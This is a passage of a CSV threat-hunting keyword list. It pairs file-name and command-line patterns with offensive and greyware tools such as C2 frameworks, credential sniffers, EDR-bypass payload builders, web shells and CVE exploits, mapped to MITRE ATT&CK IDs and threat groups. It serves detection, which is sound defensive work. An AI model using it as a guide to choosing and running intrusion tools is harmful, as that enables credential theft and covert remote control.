Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*./Ivy -*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*./koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*./Lalin.sh*,offensive_tool_keyword,LALIN,this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new,T1588,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/LALIN,1,1,N/A,N/A,4,350,164,2017-04-13T13:47:21Z,2016-06-10T07:53:49Z -*./litefuzz.py*,offensive_tool_keyword,litefuzz,A multi-platform fuzzer for poking at userland binaries and servers,T1587.004,TA0009,N/A,N/A,Exploitation tools,https://github.com/sec-tools/litefuzz,1,1,N/A,N/A,1,54,7,2023-07-16T00:15:41Z,2021-09-17T14:40:07Z -*./lse.sh*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,0,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*./manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*./Microsploit*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*./monkey.sh*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*./mythic-cli *,offensive_tool_keyword,tetanus,Mythic C2 agent targeting Linux and Windows hosts written in Rust,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://github.com/MythicAgents/tetanus,1,0,N/A,N/A,3,229,33,2023-05-14T21:34:20Z,2022-03-07T20:35:33Z -*./Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*./nmap*,greyware_tool_keyword,nmap,A very common tool. 
Network host vuln and port detector.,T1046 - T1065 - T1210.002,TA0002 - TA0007 - TA0008,N/A,N/A,Information Gathering,https://github.com/nmap/nmap,1,1,greyware tool - risks of False positive !,N/A,10,8299,2206,2023-09-29T08:27:35Z,2012-03-09T14:47:43Z -*./ntdissector*,offensive_tool_keyword,ntdissector,Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.,T1003.003,TA0006 ,N/A,N/A,Credential Access,https://github.com/synacktiv/ntdissector,1,0,N/A,9,1,73,6,2023-10-03T14:17:00Z,2023-09-05T12:13:47Z -*./nysm/src/,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*./pachine.py*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,0,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*./Passdetective*,offensive_tool_keyword,PassDetective,PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets,T1059 - T1059.004 - T1552 - T1552.001,TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/aydinnyunus/PassDetective,1,0,N/A,7,1,51,3,2023-08-16T16:51:15Z,2023-07-22T12:31:57Z -*./Pcredz *,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,0,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*./Phishing.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*./pwndrop *,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*./PyShell *,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,0,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*./RedGuard*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,1,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -*./redirector.py *,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - 
TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,0,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*./rpcrt.py*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/yuanLink/CVE-2022-26809,1,1,N/A,N/A,1,62,26,2022-05-25T00:57:52Z,2022-05-01T13:19:10Z -*./rsocx -*,offensive_tool_keyword,rsocx,A bind/reverse Socks5 proxy server.,T1090.001 - T1090.002 - T1071.001,TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/b23r0/rsocx,1,0,N/A,10,10,319,146,2022-09-28T08:11:34Z,2015-05-13T04:02:55Z -*./scan4all *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*./ScareCrow *,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./ScareCrow -*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./ScareCrow*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*./seth.sh * *,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*./snake,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*./SourcePoint *,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*./sudomy*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*./t14m4t *,offensive_tool_keyword,t14m4t,Automated brute-forcing attack tool.,T1110,N/A,N/A,N/A,Credential Access,https://github.com/MS-WEB-BN/t14m4t,1,0,N/A,N/A,4,362,77,2021-04-02T09:52:45Z,2019-10-16T14:39:33Z -*./teamserver *,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,0,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*./teamserver *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*./test/nmap*/*.nse*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*./update-beef*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,0,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*./Vegile*,offensive_tool_keyword,BruteSploit,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*./xhydra*,offensive_tool_keyword,thc-hydra,Parallelized login cracker which supports numerous protocols to attack.,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/vanhauser-thc/thc-hydra,1,0,N/A,N/A,10,8179,1825,2023-09-28T22:11:10Z,2014-04-24T14:45:37Z -*./xrkRce *,offensive_tool_keyword,POC,SunloginClient RCE vulnerable version,T1587,TA0001 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/sunlogin_rce,1,0,N/A,N/A,5,462,201,2022-02-16T16:11:42Z,2022-02-16T14:20:41Z -*./zabbix.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pykiller/CVE-2022-23131,1,1,N/A,N/A,1,0,0,2022-02-24T11:59:48Z,2022-02-24T11:34:27Z -*./zexp check -*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/jweny/zabbix-saml-bypass-exp,1,0,N/A,N/A,1,94,42,2022-02-21T04:27:48Z,2022-02-18T08:38:53Z -*.\dumpy.py*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*.\stager.ps1*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*.admin.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.adminusers.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.api.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.apps.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.asreproast.txt*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*.asse.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*.athena_utils *,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*.beta.123456.*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*.bin -enc rc4 -lang c -k 3 -o *.bin*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rc4 -lang csharp -k 9*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rot -lang csharp -k 2 -d*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*.bin -enc rot -lang rust -k 7*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - 